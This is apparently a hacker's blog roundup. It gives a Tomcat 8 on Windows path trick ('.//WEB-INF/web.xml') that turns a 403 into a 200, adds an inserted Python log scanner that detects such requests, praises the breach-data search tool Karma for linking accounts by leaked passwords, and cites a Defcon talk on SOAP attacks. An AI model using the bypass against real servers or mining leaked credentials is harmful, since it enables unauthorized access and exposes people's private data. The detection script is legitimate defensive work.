Technique:
Quick and Easy Bypass for Tomcat 8 on Windows
https://x.x.x.x/WEB-INF/web.xml -> 403 Forbidden
https://x.x.x.x/./WEB-INF/web.xml -> 403 Forbidden
https://x.x.x.x/.//WEB-INF/web.xml -> 200 OK
Haven’t had a chance to use this yet, but I’m sure I will soon.
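To check whether a server has already answered requests like the ones above, the following added example (not from the original post) scans access-log lines for request targets that canonicalize into WEB-INF or META-INF and reports whether each was served or blocked. The log lines are constructed samples in Tomcat's common access-log pattern, and the names `canonical_path` and `scan` are hypothetical; the normalization also covers percent-encoding, backslashes and letter case, which goes beyond the single case shown above.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in Tomcat's "common" access-log pattern: %h %l %u %t "%r" %s %b
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /WEB-INF/web.xml HTTP/1.1" 403 -
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /./WEB-INF/web.xml HTTP/1.1" 403 -
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /.//WEB-INF/web.xml HTTP/1.1" 200 1432
198.51.100.4 - - [01/Jan/2024:10:00:03 +0000] "GET /app/index.jsp HTTP/1.1" 200 512
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
PROTECTED = {"web-inf", "meta-inf"}  # directories a servlet container must never serve


def canonical_path(target):
    """Reduce a request target to the path the file system would resolve."""
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    path = re.sub(r"/+", "/", path)          # collapse repeated slashes
    # Drop "." and ".." segments; lower-case because Windows paths are case-insensitive.
    return posixpath.normpath(path).lower()


def scan(lines):
    """Return (client, raw_target, status, verdict) for requests resolving into a protected dir."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        if PROTECTED & set(canonical_path(target).split("/")):
            verdict = "SERVED" if status.startswith("2") else "blocked"
            findings.append((client, target, status, verdict))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(*finding)
```

Any line reported as SERVED means the container returned protected content and the deployment needs patching or a front-end rule that rejects non-canonical paths.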
Tool:
Karma
So awesome! Lets you search by username, domain or password.
For example I can search by username “gainsec” or “@gainsec.com” or “passwordforgainsec”
I’ve used this a bunch of times to find accounts that belong to the same person/organization even if they aren’t similar. Password reuse is bad! Their database isn’t especially huge but big enough to run things through. Especially if you get a hit in DeHashed.
Lecture:
Defcon 19: Don’t Drop the SOAP: Real World Web Service Testing for Web Hackers
Lots of great information for attacking Simple Object Access Protocol (SOAP)!
END TRANSMISSION